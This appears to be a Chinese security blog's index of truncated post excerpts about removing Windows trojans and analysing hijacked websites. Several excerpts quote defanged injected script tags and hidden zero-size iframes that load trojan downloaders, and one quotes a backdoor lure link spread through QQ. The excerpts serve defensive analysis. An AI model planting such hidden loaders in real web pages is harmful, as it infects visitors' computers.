其他

遭遇 kupqytu.dll/Trojan.Win32.Undef.fzq,kmwprnp.dll/Trojan.Win32.Agent.lmo 等1endurer 原創2008-06-03 第1版今天，上回遭遇 gjlbj.vya / Trojan.Win32.Agent.kle的網友（詳見：遭遇 gjlbj.vya / Trojan.Win32.Agent.kle 等）說病毒又複發了~傳pe_xscan給網友掃描log發回來一看，跟上回的差不多：  pe_xscan 08-04-26 by

遭遇 kupqytu.dll/Trojan.Win32.Undef.fzq,kmwprnp.dll/Trojan.Win32.Agent.lmo 等2endurer 原創2008-06-04 第2版用FileInfo 提取檔案資訊： 檔案說明符 : C:/WINDOWS/system32/{6e8bbb5c-e603-3b58-f714-e60333d4b63d}/kmwprnp.dll屬性 : -SHRM$簽名:否PE檔案:是擷取檔案版本資訊大小失敗!建立時間 : 2004-8-17 12:0

某縣農業網掛馬Trojan-Downloader.Win32.ACVE.az等endurer 原創2008-10-29 第1版該網首頁包含代碼：/---＜script c src=hxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o＞＜/script＞---/#1 hxxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o 包含代碼：/---document.writeln("＜iframe

某笑話網站掛馬Trojan-Downloader.Win32.Agent.rubendurer 原創2008-06-05 第1版該網網頁包含代碼：/---＜iframe width="0" height="0" src="hxxp://ad**.hav**e*ip.com/da.htm"＞＜/iframe＞---/hxxp://ad**.hav**e*ip.com/da.htm 輸出代碼：/---＜span style='width:0;height:0;visibility:hidden'＞＜

遭遇HBKernel32.sys,aliimz.sys,System.exe,koauolte.exe,cho22.tmp等1 endurer 原創2008-11-03 第1版 一位朋友的說他的電腦登入後自動登出，請偶幫忙檢修。 先嘗試安全模式，故障依舊。 當userinit.exe被惡意替換後，就會出現這種情況。 於是用Win PE光碟片啟動，用FileInfo檢查userinit.exe： 檔案說明符 : C:/WINDOWS/system32/userinit.exe屬性 :

遭遇sqmapi32.dll,kvmxfma.dll,rarjdpi.dll,google.dll,a0b1.dll等endurer 原創2007-11-07 第1版中招後IE工作不正常，電腦不定期彈廣告視窗，開啟任意網頁頂部都出現推薦FireFox的資訊；啟動程式時會報告 svchost.exe 出錯，無法運行cmd.exe、WinRAR……進入安全模式時出現藍屏錯誤：Unknown hard errorpe_xscan 07-08-30 by Purple Endurer2007-11-6

Rootkits: Is removing them even possible?Rootkits：有可能清除它們嗎？Author: Michael Kassner作者：Michael Kassner 翻譯：endurer，20008-12-02 第1版Category: General, security, Botnet分類：常規，安全，殭屍網路Tags: Built-in Sophistication, BlackLight, GMER GMER, Rootkits, Scanners,

 遇到讓檔案夾變檔案的 Trojan.Win32.ECode.ee / Trojan-Dropper.Win32.Flystud.ko endurer 原創2009-04-29 第1版 最近一位朋友的電腦反應很慢，而且出現了奇怪的現象：隨身碟中原有來檔案夾全變成了檔案。請偶幫忙看看。 下載 pe_xscan 掃描 log 並分析，發現如下可疑項（進程模組略）：pe_xscan 09-04-28 by Purple Endurer2009-4-29 13:7:47Windows XP

auto.exe/Backdoor.Win32.Agent.bgu,b8u6bvx912.sys/Trojan-Downloader.Win32.Hmir.don等2endurer 原創 2008-06-30 第1版到 http://purpleendurer.ys168.com 下載 FileInfo 和 bat_do。用FileInfo 提取 pe_xscan 的 log 中紅色標記的檔案的資訊；用 bat_do 打包備份，延時刪除，改所選檔案名稱，再延時刪除。下載並安裝 瑞星卡卡安全助手，

system.dll,Nskhelper2.sys,oapejg.sys,991b0345.dat,NsPass0.sys等1 endurer 原創2008-12-03 第1版 一位朋友的電腦中的殺毒軟體無法啟動；QQ醫生保護不停地提示有程式要修改系統配置；開啟“我的電腦”，總是在搜尋，磁碟表徵圖顯示不出來。請偶幫忙檢修。 使用 pe_xscan 掃描 log 並分析，發現如下可疑項（進程模組部分有省略）： pe_xscan 08-08-01 by Purple Endurer 2008-12-

遭遇 unixsys08.sys/Trojan-PSW.Win32.QQPass.cdw,Trojan-PSW.Win32.OnLineGames等1endurer 原創2008-07-01 第1版一位網友說他的電腦在正常模式下無法操作，於是強制重啟電腦到帶網路連接的安全模式，通過!!請偶幫忙檢修。下載 pe_xscan 掃描 log 並分析，發現如下可疑項：/===pe_xscan 08-04-26 by Purple Endurer 2008-6-30 18:20:21 Windows

遭遇svchoct.exe,vonine.exe,HBKernel32.sys,ssdtti.sys,System.exe,ublhbztl.sys等1 endurer 原創2008-10-22

10 tips to go from a beginner to intermediate developer從初學者邁向中級開發人員的10個密訣 作者：Justin James翻譯：Purple Endurer，2009-05-21 第1版分類：升職，開發人員標籤：開發人員，語言，Justin James英文來源：http://blogs.techrepublic.com.com/programming-and-development/?p=1139 Having trouble

硬碟雙擊打不開？原來是dfjje.exe,auto.exe,autorun.inf作怪endurer 原創2008-10-27 第1版一位朋友的電腦，C盤可以雙擊開啟，但D、E等其它盤雙擊打不開，右擊-開啟也不行，請偶幫忙檢修。下載 pe_xscan 掃描 log 並分析，發現如下可疑項：pe_xscan 08-08-01 by Purple Endurer2008-10-24 16:37:36Windows XP Service Pack 2(5.1.2600)MSIE:6.0.2900.21

要擷取一個檔案的長度，我們可以使用API函數 GetFileSize()。 對於PE格式的檔案，我們還可以利用PE檔案頭中的資訊來擷取檔案長度，方法是：optional header中的 SizeOfHeaders值 + 所有節表中SizeOfRawData值 = 檔案長度 PE檔案格式說明可參考：Iczelion的PE教程http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=Iczelion%E7%9

遭遇_unixsys08.sys/Trojan-PSW.Win32.QQPass.cdw,Trojan-PSW.Win32.OnLineGames等2endurer 原創2008-07-02 第1版到 http://purpleendurer.ys168.com 下載 FileInfo 和 bat_do。用FileInfo 提取 pe_xscan 的 log 中紅色標記的檔案的資訊；用 bat_do 打包備份，延時刪除，改所選檔案名稱，再延時刪除。雖然該電腦中裝有金山的KIS，但病毒還是進來了，

system.dll,Nskhelper2.sys,oapejg.sys,991b0345.dat,NsPass0.sys等2endurer 原創2008-12-03 第1版先把 Application Management，Task Scheduler 和 System Restore Service 禁用了。 下載並安裝卡卡安全助手，但是無法啟動使用。 下載並安裝超級巡警，剛查殺出task.exe，就出錯退出，無法再啟動。 到http://purpleendurer.ys168.com

某縣農業網被掛馬 Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix endurer 原創2009-05-05 第1版 開啟某縣農業網，Maxthon提示要安裝ActiveX控制項。 檢查網頁代碼，發現：/---＜script src=hxxp://***.w**vg0**.cn＞＜/script＞---/#1 hxxp://***.w**vg0**.cn 

某縣農業資訊網掛馬 Worm.Win32.AutoRun.umf 網站首頁包含代碼：/---＜script src=hxxp://w**.9*4sa**om*m*.com/js.js＞＜/script＞---/#1 hxxp://w**.9*4sa**om*m*.com/js.js輸出代碼：/---＜iframe src=hxxp://w**.c**6*6f**.cn/swf.htm width=100 height=0＞＜/iframe＞---/ #1.1

免費刷會員和六鑽工具？小心通過QQ傳播的灰鴿子Backdoor.Win32.Gpigeon.gemendurer原創2009-02-18 第1版某QQ群一個成員發了一個訊息：免費刷會員和六鑽。。請大家下載工具來刷。。下面是下載工具的網站 hxxp://*59．*32．128．135：2*80/%E5%88%B7%E4%BC%9A%E5%91%98%E5%92%8C%E5%85%AD%E9%92%BB.exe感覺可疑，用HttpRead下載回來，用FileInfo提取檔案資訊：檔案說明符 : D: